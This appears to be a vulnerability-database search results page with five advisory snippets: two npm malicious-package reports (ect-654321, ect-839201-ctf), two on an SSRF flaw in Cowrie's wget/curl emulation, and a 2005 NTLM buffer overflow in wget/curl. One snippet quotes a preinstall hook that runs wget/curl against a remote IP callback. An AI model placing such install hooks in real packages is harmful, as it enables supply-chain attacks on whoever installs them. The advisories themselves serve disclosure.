Lucene search
+L

5 matches found

OSV
OSV
added 2026/06/12 9:31 p.m.15 views

MAL-2026-5719 Malicious code in ect-654321 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ec784a9a1926de8d2c18de41c996e69e10f7001bf9fdc7604edc22d5775b4540 ect-654321 contains only a package.json with a preinstall lifecycle hook that unconditionally executes wget...

5.4AI score
Exploits0References8
OSV
OSV
added 2026/06/12 9:31 p.m.14 views

MAL-2026-5721 Malicious code in ect-839201-ctf (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bda37f74ff0d1b56cb7805906d4fd32a7e2ccc15aa96768d9f9e510202712dcb On npm install, package.json's preinstall script executes wget http://10.107.121.85:8000/callbackwget || curl http://10.107.121.85:8000/callbackcurl ...

6.2AI score
Exploits0References2
Github Security Blog
Github Security Blog
added 2025/12/20 5:42 p.m.14 views

Cowrie has a SSRF vulnerability in wget/curl emulation enabling DDoS amplification

Summary A Server-Side Request Forgery SSRF vulnerability in Cowrie's emulated shell mode allows unauthenticated attackers to abuse the honeypot as an amplification vector for HTTP-based denial-of-service attacks against arbitrary third-party hosts. Details When Cowrie operates in emulated shell...

7.5CVSS7.3AI score0.00616EPSS
Exploits1References8Affected Software1
Positive Technologies
Positive Technologies
added 2025/12/20 12:0 a.m.9 views

PT-2025-54458

Name of the Vulnerable Software and Affected Versions Cowrie versions prior to 2.9.0 Description Cowrie versions before 2.9.0 have a server-side request forgery SSRF issue in the emulated shell implementations of wget and curl. The default configuration allows these commands to make real outbound...

8.3CVSS7.5AI score0.00616EPSS
Exploits1References16
OSV
OSV
added 2005/10/13 10:2 p.m.4 views

DEBIAN-CVE-2005-3185

Stack-based buffer overflow in the ntlmoutput function in http-ntlm.c for 1 wget 1.10, 2 curl 7.13.2, and 3 libcurl 7.13.2, and other products that use libcurl, when NTLM authentication is enabled, allows remote servers to execute arbitrary code via a long NTLM username...

7.5CVSS8.1AI score0.05188EPSS
Exploits0References1
Rows per page
Query Builder